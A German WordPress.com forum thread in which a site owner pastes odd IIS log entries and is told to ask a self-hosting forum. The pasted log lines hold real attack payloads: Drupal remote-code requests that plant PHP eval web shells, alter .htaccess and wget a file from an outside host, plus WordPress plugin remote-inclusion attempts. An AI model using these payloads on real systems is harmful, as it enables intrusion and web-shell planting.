Merkwürdige Serverlogeinträge

johnnii360 · Mitglied · April 28, 2019 at 6:09 pm

Servus zusammen!

Ich habe heute mal meine IIS Serverlogs durchforstet und dabei ist mir im Log vom 09.04.2019 folgendes aufgefallen:

2019-04-09 09:15:05 144.76.93.228 POST / q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 80 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 303 0 0 133
2019-04-09 09:15:07 144.76.93.228 GET / q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 443 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 200 0 0 122
2019-04-09 09:15:09 144.76.93.228 POST /user/register/ element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 80 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 303 0 0 154
2019-04-09 09:15:11 144.76.93.228 GET /user/register/ element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax 443 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 404 0 2 48
2019-04-09 09:15:14 144.76.93.228 POST /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://www.acne-school.ru//sites/all/modules/webform/tests/subform.txt&wpaa=phpinfo();exit(); 80 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 303 0 0 105
2019-04-09 09:15:15 144.76.93.228 GET /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://www.acne-school.ru//sites/all/modules/webform/tests/subform.txt&wpaa=phpinfo();exit(); 443 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 404 0 2 30
2019-04-09 09:15:19 144.76.93.228 POST /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://customcoverinc.com/images/banners/shopreadme.txt&wpaa=phpinfo();exit(); 80 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 303 0 0 160
2019-04-09 09:15:21 144.76.93.228 GET /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://customcoverinc.com/images/banners/shopreadme.txt&wpaa=phpinfo();exit(); 443 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 404 0 2 30
2019-04-09 09:15:22 144.76.93.228 POST /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://www.tekmat.net/wp-content/uploads/2014/04/jpg.txt&wpaa=phpinfo(); 80 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 303 0 0 66
2019-04-09 09:15:23 144.76.93.228 GET /wp-admin/admin-post.php swp_debug=load_options&swp_url=http://www.tekmat.net/wp-content/uploads/2014/04/jpg.txt&wpaa=phpinfo(); 443 - 91.121.222.157 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.90+Safari/537.36 http://www.google.com.hk 404 0 2 30

Kann mir evtl. jemand sagen was das sein soll? Letzteres sieht so nach Spionage aus.

Ich habe folgende Plugins aktiv:

Amazon Associates Link Builder
Invisible reCaptcha
WP User Avatar
WP-Matomo
WPForms Lite
Yoast SEO

analbarbiekatja · Mitglied · April 28, 2019 at 7:16 pm
Link kopieren
Hallo!

Dies ist das Forum des Bloghosters WordPress.COM. Wir verwenden zwar auch die Blog-Engine WordPress, aber wir hosten unsere Blogs nicht selbst auf eigenen Servern.

Daher können wir dir auch nicht helfen, wenn du (technische) Fragen hast, die ein selbstgehostetes WordPress-Blog betreffen!

Wenn du ein selbstgehostetes WordPress-Blog hast, bist du hier falsch! Frage bitte bei einem der WordPress.org-Foren (http://forum.wpde.org/ oder http://de.forums.wordpress.org) nach!

Oder im englisch-sprachigen Forum unter: http://wordpress.org/support/

Wenn Du unsicher bist, ob Du selbst hostest oder nicht, hilft Dir dieser Support-Beitrag:
http://de.support.wordpress.com/com-vs-org/

Hier findest Du die englische Originalseite:

WordPress.com vs. WordPress.org

Vielen Dank!
johnnii360 · Mitglied · April 28, 2019 at 9:18 pm
Link kopieren
Oh, okay. Danke!

Das Thema ‘Merkwürdige Serverlogeinträge’ ist für neue Antworten geschlossen.

Merkwürdige Serverlogeinträge

Du konntest nicht finden, was du brauchst?

Kontaktiere uns

Durchsuche unsere Ratgeber

Mobil-Apps

Social Media